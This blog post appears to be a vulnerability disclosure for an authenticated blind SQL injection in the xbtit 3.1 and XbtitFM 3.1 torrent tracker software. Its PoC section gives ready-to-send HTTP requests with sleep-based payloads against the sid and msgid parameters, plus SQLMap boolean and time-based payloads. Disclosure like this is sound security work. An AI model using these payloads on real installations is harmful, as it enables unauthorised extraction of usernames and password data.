Blind SQL Injection affecting xbtit 3.1 and xbtitFM 3.13 min read

SQL Injection

A blind SQL Injection vulnerability exists in Xbtit 3.1 and XbtitFM 3.1 via the sid parameter (GET) in /ajaxchat/getHistoryChatData.php file that is accessible by a simple registered user with default privileges. As a result a malicious user can extract sensitive data such as usernames and passwords and in some cases use this vulnerability in order to gain remote code execution.

——————————————

[Vulnerability Type]
SQL Injection

——————————————

[Vendor of Product]
Btiteam
https://github.com/btiteam/xbtit-3.1

——————————————

[Affected Product Code Base]
Xbtit 3.1
https://github.com/btiteam/xbtit-3.1/ (Latest as of 22-12-2021)
https://github.com/btiteam/xbtit-3.1/blob/master/ajaxchat/getHistoryChatData.php

XbtitFM 3.1 (Private source code thus not available to analyze further)
https[://]xbtit.eu/xbtitfm/
XbtitFM is using xbtit’s core with additional features. It is also affected by the same issue and additionally on the extra file (/chatedit.php) and vulnerable GET  id parameter (msgid) that offer similar functionality.

——————————————

[Attack Type]
Remote – Authenticated

——————————————

[Impact Information Disclosure]
True

——————————————

[PoC]

Login as a simple user make a comment in the chat box. The sid parameter is vulnerable to an authenticated blind SQL injection. Use the following PoC and cause a sleep delay for 20 seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the sid parameter must be a valid chat message id you have already generated!


http://xbtit.local/xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit

Original request

Modified request to include SQLi payload

GET /xbtit/xbtit-3.1-master/index.php?page=allshout&sid=5537%20and%20(select*from(select(sleep(20)))a)--%20&edit HTTP/1.1
Host: xbtit.local
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://xbtit.local/xbtit/xbtit-3.1-master/index.php?page=allshout
Cookie: ajax_poller_1=1; uid=6; pass=e6d36bba3f1b36152182ad0093441345; PHPSESSID=oe2bebgui5b6dhoavg59n3nnmf
Upgrade-Insecure-Requests: 1

 

SQLMap payloads

Boolean-based blind payload: page=allshout&sid=2201 AND 5205=5205&edit
Time-based blind payload: page=allshout&sid=2201 AND (SELECT 8933 FROM (SELECT(SLEEP(5)))gkzE)&edit

XbtitFM 3.1 (Private source code) is using xbtit’s core with additional features. It is also affected by the same issue and additionally on the extra file named (/chatedit.php) and vulnerable GET id parameter (msgid) that offer almost similar functionality.

So we can apply the same on /chatedit.php instead of /getHistoryChatData.php and msgid (GET) instead of sid (GET) parameter.


GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20 HTTP/1.1
Host: xbtit.local
Cookie: uid=4; pass=f530298bfc5cd53f7316fb2f1fe34a52; PHPSESSID=f3vdo18n1t834jg6d6ok3lch36
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

Use the following PoC and cause a sleep delay for 20 seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the msgid parameter must be a valid chat message id you have already generated!


GET /chatedit.php?action=edit&msgid=16%20and%20(select*from(select(sleep(20)))a)--%20

 

[Reference]

https://github.com/btiteam/xbtit-3.1/

Leave a Reply

Your email address will not be published. Required fields are marked *